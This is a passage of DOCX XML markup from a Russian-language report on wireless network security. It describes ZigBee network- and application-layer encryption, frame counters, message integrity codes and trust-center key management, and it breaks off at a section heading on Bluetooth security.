      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0021A">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="003802F9">
        <w:t>[21]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="003802F9" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003802F9">
        <w:rPr>
          <w:lang w:val="en-US"/>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55"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidTr="00FA70D2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="2944091" cy="1163064"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="10" name="Рисунок 10" descr="http://www.russianelectronics.ru/files/57691/---ek--10---2011----------r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ussianelectronics.ru/files/57691/---ek--10---2011----------ris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6132" cy="1163870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidTr="00FA70D2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
            <w:r w:rsidRPr="000C799E">
              <w:t>Рис</w:t>
            </w:r>
            <w:r w:rsidR="005C04B7">
              <w:t xml:space="preserve">унок </w:t>
            </w:r>
            <w:r w:rsidR="00F0021A">
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="005C04B7">
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> Шифрование на сетевом уровне</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:br/>
        <w:t>Сетевой заголовок зашифрованного пакета включает 32-бит счетчик фреймов. Каждый узел в сети поддерживает собственный 32-бит счетчик фреймов, который увеличивается на 1 при отправке любого пакета. Дополнительно, каждый узел отслеживает счетчики фреймов всех соседних узлов. Если получаемый пакет от соседнего узла имеет номер фрейма меньший, чем был до этого, такой пакет отбрасывается. Счетчики фреймов используются для противостояния т.н. взлому защиты путем замещения оригинала (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Replay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>). Счетчик фреймов последовательно увеличивается до своего максимального значения 0хFFFFFFFF и далее не изменяется. При достижении его максимального значения узел не сможет более отправлять пакеты. В связи с большой разрядностью переполнение счетчика фреймов маловероятно — при отправке сообщений каждую секунду насыщение счетчика произойдет через 136 лет. Для поддержания высокой степени защиты обнуление счетчика фреймов возможно только лишь при смене сетевого ключа шифрования.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:br/>
        <w:t xml:space="preserve">Сетевой заголовок, APS-заголовок и полезные данные дополняются сертификатом подлинности. Над содержимым этих полей выполняется хеширование, и к пакету добавляется код целостности сетевого сообщения (4-байт </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Integrity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>nMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>nMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">-код позволяет получателю быть уверенным в том, что сообщение не было изменено. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>nMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">-код обеспечивает целостность сообщений в сети </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>integrity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">). Если узел получает пакет с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>nMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>-кодом, не соответствующим принятому сообщению, такой пакет отбрасывается.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:br/>
        <w:t xml:space="preserve">В безопасной </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">-сети пакет дешифруется и шифруется при каждой ретрансляции на всем маршруте следования. Промежуточный узел дешифрует </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>пакет и проверяет его целостность. Если пакет предназначен не этому узлу, то данные вновь зашифровываются и аутентифицируются на основе счетчика фреймов и сетевого адреса (входят в сетевой заголовок) промежуточного узла. Дополнительные операции в сети с безопасностью увеличивают задержки при доставке сообщений. Кроме того, максимальный объем полезных данных в пакете уменьшается на 18 байт за счет добавления счетчика фреймов, адреса источника, MIC-кода и некоторых других служебных байтов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Безопасность на уровне приложения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Безопасность на уровне приложения (APS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>layer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>) позволяет зашифровать полезные данные с помощью ключа шифрования, известному только отправителю и получателю пакета. В то время как сетевое шифрование на базе сетевого ключа применяется ко всем сообщениям внутри сети, шифрование на уровне приложения является необязательным и может использоваться только при отсылке конкретного пакета. Шифрование на уровне приложения не может применяться к широковещательным рассылкам. Шифрование полезных данных и формирование кода целостности сообщения производится на основе 128-бит алгоритма AES (</w:t>
      </w:r>
      <w:r w:rsidR="005C04B7">
        <w:t>Рисунок 4</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">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55"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidTr="00FA70D2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3138055" cy="1195053"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
                  <wp:docPr id="9" name="Рисунок 9" descr="http://www.russianelectronics.ru/files/57691/---ek--10---2011----------r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ussianelectronics.ru/files/57691/---ek--10---2011----------ris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912" cy="1195760"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidTr="00FA70D2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="005C04B7" w:rsidP="00C07525">
            <w:r>
              <w:t xml:space="preserve">Рисунок </w:t>
            </w:r>
            <w:r w:rsidR="00F0021A">
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r w:rsidR="00FA70D2" w:rsidRPr="000C799E">
              <w:t>Шифрование на уровне приложения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:br/>
        <w:t>Код</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>целостности</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>сообщения</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>данном</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>случае</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>отличается</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>от</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>кода</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>получаемого</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>шифровании</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>уровне</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>сети</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Получатель сообщения не будет использовать принятый пакет, если вычисляемая им хеш-функция над полезными данными даст результат, отличный от </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>aMIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">-кода в самом пакете. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">При шифровании на уровне приложения используются два типа ключей — связной ключ для обмена данными с центром доверия и ключ шифрования данных приложения. Промежуточные узлы сети не могут получить доступ к этим данным, т.к. ключ шифрования данных приложения известен только отправителю и получателю. Использование безопасности на уровне приложения уменьшает максимальную величину полезных данных на 9 байт. На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00DC0109">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> приведена диаграмма пакета для случая одновременного использования безопасности на уровне сети и на уровне приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">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55"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidTr="00FA70D2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
            <w:r w:rsidRPr="000C799E">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3068955" cy="1884045"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="8" name="Рисунок 8" descr="http://www.russianelectronics.ru/files/57691/---ek--10---2011----------r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ussianelectronics.ru/files/57691/---ek--10---2011----------ris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955" cy="1884045"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidTr="00FA70D2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00FA70D2" w:rsidRPr="000C799E" w:rsidRDefault="00FA70D2" w:rsidP="00C07525">
            <w:r w:rsidRPr="000C799E">
              <w:t>Рис</w:t>
            </w:r>
            <w:r w:rsidR="00E67626">
              <w:t xml:space="preserve">унок </w:t>
            </w:r>
            <w:r w:rsidR="00F0021A">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00E67626">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> Шифрование на уровне сети и приложения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Центр управления безопасностью</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Ключевым элементом концепции безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> является Центр управления безопасностью. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>На этапе формирования или реконфигурации сети центр управления безопасностью разрешает или запрещает присоединение к сети новых устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="00880DF7" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Центр управления безопасностью может периодически обновлять ключ сети и переходить на новый ключ. Сначала он транслирует новый ключ, зашифрованный с помощью старого ключа сети. Затем сообщает всем устройствам о переходе на новый ключ.</w:t>
      </w:r>
      <w:r w:rsidR="003802F9" w:rsidRPr="00880DF7">
        <w:t>[22]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Обычно центром управления безопасностью по совместительству является координатор сети, но это может быть и выделенное устройство. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Центр управления играет следующие роли в обеспечении безопасности:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>проверяет подлинность устройств, желающих присоединиться к сети,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>поддерживает и распространяет сетевые ключи,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00A924A9">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>обеспечивает безопасность взаимодействия устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Режим стандартной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00A924A9">
      <w:r w:rsidRPr="000C799E">
        <w:t>В режиме стандартной безопасности перечень устройств, главные ключи, ключи каналов связи и сетевые ключи можно хранить как в центре управления безопасностью, так и в самих устройствах. Центр управления безопасностью, тем не менее, отвечает за поддержание стандартного сетевого ключа и контролирует политику приема в сеть. В этом режиме требования к ресурсам памяти центра управления безопасностью гораздо ниже, чем для режима повышенной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Режим повышенной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F2E" w:rsidRPr="000C799E" w:rsidRDefault="00953F2E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>В режиме повышенной безопасности центр управления безопасностью хранит перечень устройств, главные ключи, ключи каналов связи и сетевые ключи, необходимые для контроля и применения политики обновления сетевых ключей и доступа в сеть. В этом режиме по мере роста количества устройств в сети быстро возрастает необходимый центру управления безопасностью объем памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="00CA6DC7" w:rsidRDefault="00531A24" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc503991004"/>
      <w:r w:rsidRPr="00531A24">
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="00D91A39" w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Обеспечение безопасности в протоколе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D91A39" w:rsidRPr="000C799E">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D91A39" w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> , BLE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
